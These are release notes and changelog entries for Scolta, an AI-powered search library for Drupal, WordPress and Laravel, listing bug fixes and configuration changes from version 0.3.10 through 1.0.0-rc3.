⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc3
Third release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Highlights
- Fixed inverted expand_primary_weight merge semantics. The WASM N-set merge was applying the configured weight to expanded results instead of original results, inverting the documented behavior. expand_primary_weight: 0.9 now correctly gives original query results 90% weight and expansion results 10%.
- expandPrimaryWeight now included in expand-query API response payload.
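The corrected weight semantics can be illustrated with a minimal JavaScript sketch. This is not the WASM N-set merge itself: the function name mergeWeighted, the { url, score } result shape, and the simple linear blend are all assumptions made for illustration. Only the meaning of the weight (the share given to original-query results) comes from the note above.

```javascript
// Hypothetical sketch: blend scores from the original query and from the
// AI-expanded query. `primaryWeight` plays the role of expand_primary_weight:
// it is applied to ORIGINAL results, and expansion results get the remainder.
function mergeWeighted(primary, expanded, primaryWeight) {
  const combined = new Map();
  const add = (results, weight) => {
    for (const { url, score } of results) {
      combined.set(url, (combined.get(url) ?? 0) + weight * score);
    }
  };
  add(primary, primaryWeight);      // e.g. 0.9 -> 90% of the blended score
  add(expanded, 1 - primaryWeight); // e.g. 0.1 -> 10% of the blended score
  return [...combined.entries()]
    .map(([url, score]) => ({ url, score }))
    .sort((a, b) => b.score - a.score);
}

// Two equally scored hits: the original-query hit should rank first.
const merged = mergeWeighted(
  [{ url: "/a", score: 1.0 }],
  [{ url: "/b", score: 1.0 }],
  0.9
);
```

With the inverted behavior described above, the same call would have ranked /b ahead of /a, which is why a high weight appeared to favor expansion results before this fix.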
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc3/CHANGELOG.md
⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc2
Second release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Changes since rc1
- update-js-checksum composer script. Regenerates assets/js/scolta.js.sha256 after editing the canonical JS file: composer run update-js-checksum.
- scolta.js auto_language_filter now overrides stale URL f_language params on language switch.
- Pagefind filter index CBOR structure corrected to match Pagefind CLI output. Any filter-based search returned 0 results with the previous structure.
- ScoltaConfig::fromArray() now coerces string values to the correct PHP type before assignment. Fixes TypeError crash on Drupal sites using drush config:set.
- ScoltaConfig::$aiSummaryMaxTokens default restored to 512.
- ScoltaConfig::$autoLanguageFilter added (default false). Language filter is now opt-in.
- scolta.js filter sidebar counts restored from computeFilterCounts(allScoredResults).
- auto indexer now always means PHP on all code paths.
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc2/CHANGELOG.md
⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues
Scolta 1.0.0-rc1
First stable release — all features from 0.3.x promoted to 1.0 API surface.
Fixed
- scolta.js initPagefind() now uses a module-level pagefindInstance guard to prevent calling pagefind.init() more than once per page. Pagefind uses a SharedWorker that persists across navigations; calling init() a second time (e.g. on Drupal behavior re-attachment after a language switch) corrupts the WASM pointer permanently, causing "No pointer" errors and zero search results for the remainder of the tab session. The guard is stored in the outer IIFE scope so it spans all createInstance() calls on the same page.
- Summarize endpoint no longer returns HTTP 400 on large result sets. The context parameter validation limit has been raised from 50,000 to 100,000 characters. The client truncates to 49,000 characters before sending, so this server-side limit acts as a safety net only.
- IndexBuildOrchestrator now reports failure when the atomic swap or post-build sanity check fails. Two silent failure modes are closed: (1) atomicSwap() now throws RuntimeException if any rename() call returns false, so a failed filesystem rename can no longer cause a false-success result; (2) after the swap, verifyOutputHasFragments() checks that the pagefind output directory contains at least one .pf_fragment file when pages were processed; zero fragments after a non-empty build is treated as a hard failure. Both errors surface through the existing try/catch and are returned as success: false with a descriptive error string. (scolta-php#46)
- ContentExporter::filterItems() no longer crashes on CachedContentReference objects during re-index. When a prior build's timestamp manifest exists, gather() yields a mix of ContentItem and CachedContentReference objects (cache-hit markers for unchanged posts). filterItems() previously accessed $item->bodyHtml on every item, which is not a property of CachedContentReference. Added instanceof CachedContentReference type guard to pass cached items through without inspection. Fixes PHP fatal error on WordPress and any other platform on any site with a prior build.
- AI summary max_tokens raised from 512 to 1024. The previous limit caused the AI to truncate mid-markdown on multi-result summaries; the last result was particularly vulnerable. The new default halves truncation frequency. The value is now configurable via ScoltaConfig::$aiSummaryMaxTokens.
- cleanBrokenMarkdown() added to scolta.js before formatSummary() renders markdown to HTML. Mirrors the existing PHP MarkdownRenderer::cleanBrokenLinks() salvage logic: unclosed markdown links become bold text, unclosed bold/italic/backtick delimiters are closed. Prevents truncated AI output from producing broken HTML in the browser.
- AiClient now auto-appends /v1/chat/completions to OpenAI base_url values that have no path. LiteLLM proxies (including Amazee.ai) return a base URL without a path component. Passing that URL directly caused 405 Method Not Allowed errors. When the base_url has no path (or only /), the standard OpenAI chat completions path is appended automatically. URLs that already contain a path are used as-is.
- AmazeeClient::provisionTrial() and signIn() now parse the nested API response format, and token validation is removed from the provisioning path. The Amazee.ai /auth/generate-trial-access endpoint now returns credentials nested under a key object, and signIn wraps the access token under a token object. Both methods now check for the nested format first and fall back to the legacy flat format for backwards compatibility. The post-provisioning validateToken() call is removed from provisionTrial() because the /auth/me endpoint no longer exists on Amazee.ai's LiteLLM proxy; the token issued by the provisioning API is trusted directly.
- scolta.js result URLs resolved against pagefind base path instead of site root. pagefindBase was stored as an absolute URL (with origin), but pagefind.js returns root-relative URLs after applying its baseUrl (a path, not an origin). The startsWith check never matched, so the pagefind prefix was never stripped; result links pointed to /wp-content/uploads/scolta/pagefind/product/… instead of /product/…. pagefindBase is now stored as a path-only value by stripping the origin via new URL().pathname when the pagefind path is absolute.
- Adapter install: DrupalCI job failed because the release-validation workflow replaced the entire repositories array (wiping the packages.drupal.org/8 Drupal Packagist entry) instead of only swapping the local path repo for the GitHub VCS repo. The PHP inline script now filters out only the path-type scolta-php entry and appends the VCS repo, leaving other repository sources (including the Drupal Packagist) intact.
- Search status message text no longer overflows on narrow viewports. .scolta-results-header now carries overflow-wrap: break-word and word-wrap: break-word, and its first-child <span> gains min-width: 0 so the flex item can shrink below its content size. Long messages (e.g. "— no exact matches found, showing partial matches") wrap correctly at 320 px, 768 px, 1024 px, and 1440 px viewport widths. (#51)
- Memory profile documentation claimed "peak RSS ≤ 96 MB" for the conservative profile, but 96 MB is Scolta's internal allocation budget; total process RSS also includes the PHP runtime baseline (typically ~60 MB for Laravel CLI, ~80 MB for WordPress, ~130 MB for Drupal) and I/O overhead. PHPDoc for MemoryBudget::conservative(), MemoryBudgetSuggestion::suggest() reason strings, and checkProfileFit() warning messages now use "internal allocation budget" rather than "peak RSS". The README Memory and Scale section is updated with a platform baseline table and corrected estimates for total expected RSS per profile. The balanced and aggressive README comments ("~200 MB peak RSS" and "~384 MB peak RSS") are corrected to match the actual internal budget values (384 MB and 1 GB). (scolta-php#47)
- HealthChecker no longer reports ai_configured: true when the API key is whitespace-only. The previous !empty() check treated strings containing only spaces or tabs as configured. Changed to trim() !== '' so only non-empty, non-whitespace keys (including Amazee.ai tokens stored as the API key) report as configured.
- AI endpoints return HTTP 200 with empty data instead of 503 when no API key is configured. A new ApiKeyMissingException is thrown by AiClient when no API key is set. AiEndpointHandler catches it specifically, before the generic exception handler, and returns a graceful empty response: handleSummarize returns {} (no summary shown), handleExpandQuery returns the original query (no expansion), and handleFollowUp returns an empty response. Sites without AI configured no longer produce 503 console errors on every search. The scolta.js fetch catch blocks also now suppress TypeError (network unreachable / offline) silently rather than logging a warning or showing an error state, so search works normally when the AI endpoint is unreachable. (#50)
- Tests added for CATEGORY and VARIETY rules in the summarize prompt template, and for {SITE_NAME} placeholder presence in all three templates. Both CMS adapters delegate to DefaultPrompts::getTemplate() at runtime; these tests lock in the template contracts so prompt drift is caught immediately if the canonical text is removed or emptied. (#49)
- scolta.js result links no longer double the path on subdirectory installs. Result display URLs now prefer data.meta?.url (the verbatim URL stored in data-pagefind-meta by the binary indexer) over Pagefind's resolved data.url. Pagefind's JS client resolves stored root-relative paths against the pagefind base directory when building data.url, which on a subdirectory install (/drupal/web/) produces paths like /drupal/web/sites/default/files/scolta-pagefind/drupal/web/node/42. Using data.meta?.url avoids this resolution entirely; resolveUrl(data.url) is kept as the fallback for the PHP indexer path where data.meta.url is undefined. (scolta-drupal#40)
- IndexBuildOrchestrator::build() now returns error: 'memory_abort' when MemoryTelemetry fires. The catch block detects RuntimeException messages containing "exceeds safe threshold" and returns a structured StatusReport with error: 'memory_abort', the number of chunks already committed, and the committed page count from the build manifest. Framework adapters can now programmatically distinguish a memory abort from other failures and spawn a fresh --resume process automatically.
- Memory telemetry now measures actual RSS instead of PHP's allocator-reported memory. MemoryTelemetry reads VmRSS and VmHWM from /proc/self/status on Linux, falling back to memory_get_usage(true) / memory_get_peak_usage(true) when /proc is unavailable (macOS, Windows). Also reads cgroup v2/v1 memory limits (/sys/fs/cgroup/memory.max, /sys/fs/cgroup/memory/memory.limit_in_bytes) to determine the effective ceiling: on containerised/shared hosting the cgroup limit is often lower than memory_limit, and either one can SIGKILL the process. The 90% abort threshold and the heap-full guard in IndexBuildOrchestrator now use actual RSS against the effective limit. StatusReport.peakMemoryBytes now reports the RSS high-water mark (VmHWM) rather than PHP's monotonic memory_get_peak_usage(true).
- IndexBuildOrchestrator tail chun...
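The pagefindBase fix in the list above (store a path-only base, then strip it from root-relative result URLs) can be sketched as follows. This is an illustration under stated assumptions, not the scolta.js implementation: the helper names toPathOnly and stripPagefindPrefix, the example.com origin, and the blue-widget slug are hypothetical.

```javascript
// Hypothetical helpers; names are illustrative, not taken from scolta.js.

// Reduce a configured pagefind location to a path-only value.
function toPathOnly(pagefindPath) {
  // Absolute URLs carry an origin; keep only the pathname.
  if (/^https?:\/\//i.test(pagefindPath)) {
    return new URL(pagefindPath).pathname;
  }
  return pagefindPath;
}

// Strip the pagefind prefix from a root-relative result URL, if present.
function stripPagefindPrefix(resultUrl, pagefindBase) {
  const base = pagefindBase.replace(/\/+$/, ""); // drop trailing slashes
  return resultUrl.startsWith(base + "/")
    ? resultUrl.slice(base.length)
    : resultUrl;
}

// Assumed example values: an absolute pagefind location and a result URL
// that pagefind.js returned with the base path already applied.
const base = toPathOnly("https://example.com/wp-content/uploads/scolta/pagefind/");
const link = stripPagefindPrefix(
  "/wp-content/uploads/scolta/pagefind/product/blue-widget/",
  base
);
```

Comparing a root-relative URL against a base that still carries its origin can never succeed with startsWith, which is the mismatch the fix removes; once both sides are paths, the prefix check behaves as intended.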
v0.3.10
Fixed
- WASM merge URL lookup now handles normalized URL formats: merge_results in WASM may normalize URLs (strip .html, trailing slash, lowercase) before deduplication, causing the JS result-data lookup to miss and fall back to a stub object. The data map now indexes each result under four key variants (raw, normalized, slash-stripped, both) and falls through them in order; misses are logged as [scolta:merge] WASM URL lookup missed.
- Title deduplication threshold lowered to 0.6 Jaccard: the 0.7 threshold was too permissive for short titles and multi-word proper nouns, letting near-duplicate titles through. Threshold is now 0.6, with an additional secondary condition: any pair sharing ≥3 words where the intersection covers ≥60% of the shorter title is also considered duplicate.
- AI Overview headings now render as HTML: #, ##, and ### markdown headings in AI summaries were falling through to <p> tags and displaying as raw # text. formatSummary() now maps them to <h3>/<h4>/<h5> elements.
- AI summary now describes post-expansion results: summarizeResults() was firing in parallel with the expansion merge, so the AI described the Phase 1 literal-keyword ranking while the displayed results showed the semantically-reordered Phase 2 ranking. Summarization is now deferred until after mergeExpandedSearchResults() completes. A searchVersion staleness check prevents summarizing results from a superseded search.
- Relative URLs from pagefind index are absolutized before use: ContentItem normalizes stored URLs to relative paths for portability, but the JS needs absolute URLs in two places: the summarize API call (so the AI can include working links in the overview text) and result card <a> href attributes. Both now prepend window.location.origin when the URL starts with /.
- ContentItem normalizes absolute URLs to relative paths: the pagefind index stores URLs verbatim into the binary .pf_fragment files at build time. When a DDEV local URL (https://myapp.ddev.site/path) was passed as ContentItem::$url, that domain was baked into the index and served as the click-through URL on the hosted demo. The constructor now strips scheme and host from any URL that contains ://, leaving only the path (and optional query/fragment). Relative URLs pass through unchanged. All platform adapters benefit automatically; no code changes needed in Drupal, WordPress, or Laravel integrations. Existing indexes must be rebuilt to get correct relative URLs.
- stripHtml() now decodes HTML entities: the previous regex-only implementation stripped tags but left entities (such as the encoded form of ’) intact. escapeHtml() then double-encoded the &, causing titles and excerpts with curly quotes or other encoded characters to display as literal entity strings (e.g. the apostrophe in Houston, We’ve Had a Problem). stripHtml() now uses DOM parsing (innerHTML/textContent) to both strip tags and decode entities in one pass.
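The two-condition title duplicate test from the list above can be sketched in JavaScript as shown below. This is a rough illustration, not the shipped code: the function names, the tokenization (lowercase, split on non-alphanumerics), and the inclusive comparisons are assumptions; only the 0.6 Jaccard threshold and the "≥3 shared words covering ≥60% of the shorter title" rule come from the notes.

```javascript
// Hypothetical sketch of the two-condition duplicate test described above.
// Tokenization (lowercase, split on non-alphanumerics) is an assumption.
function titleWords(title) {
  return new Set(title.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean));
}

function isDuplicateTitle(a, b, threshold = 0.6) {
  const wa = titleWords(a);
  const wb = titleWords(b);
  if (wa.size === 0 || wb.size === 0) return false;

  // Count words present in both titles.
  let shared = 0;
  for (const w of wa) if (wb.has(w)) shared++;

  // Primary condition: Jaccard similarity = |A ∩ B| / |A ∪ B|.
  const union = wa.size + wb.size - shared;
  if (shared / union >= threshold) return true;

  // Secondary condition: at least 3 shared words that cover
  // at least 60% of the shorter title.
  const shorter = Math.min(wa.size, wb.size);
  return shared >= 3 && shared / shorter >= 0.6;
}

// A short title fully contained in a longer one: Jaccard is only 4/8 = 0.5,
// but the secondary condition (4 shared words, 100% of the shorter title) applies.
const contained = isDuplicateTitle(
  "Apollo 13 Mission Report",
  "Apollo 13 Mission Report 1970 Final Edition Archive"
);
```

The secondary condition exists for exactly this shape of pair: a long title dilutes the union enough to pull Jaccard under the threshold even when the shorter title is entirely repeated.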
Added
- ContentItem::$filters and PagefindHtmlBuilder extra-filter support: a new optional filters: array<string, string> parameter on ContentItem lets platform adapters attach arbitrary Pagefind filter attributes (e.g. ['base_topic' => 'Cardiology']) that bypass HtmlCleaner and are emitted directly as <span data-pagefind-filter="key:value" hidden> elements in the exported HTML. InvertedIndexBuilder merges these into the page's filters map so the PHP indexer path also exposes them. Use case: topic-family deduplication, faceted navigation, or any per-document filter that should not be derived from body text.
Changed
- content_catalog preset gains expand_primary_weight: 0.9. Validation testing showed that intent-based queries ("something about space") return zero raw pagefind results because stop words dominate the query. The AI expands to useful terms ("astronomy, celestial bodies") but at the old weight (default 0.5) those expanded results were diluted by the empty primary set. 0.9 gives AI-expanded results nearly equal weight to primary results, recovering the intent-based query path. Raised from implicit default (0.5) to 0.9.
- ecommerce preset expand_primary_weight raised to 0.8. Validation testing showed that natural-language product queries ("sparkly blue gift") succeed with AI expansion but the 0.7 weight left expanded results slightly under-weighted. 0.8 brings better balance for informal shopping queries without sacrificing precision for specific product name queries. Raised from 0.7 to 0.8.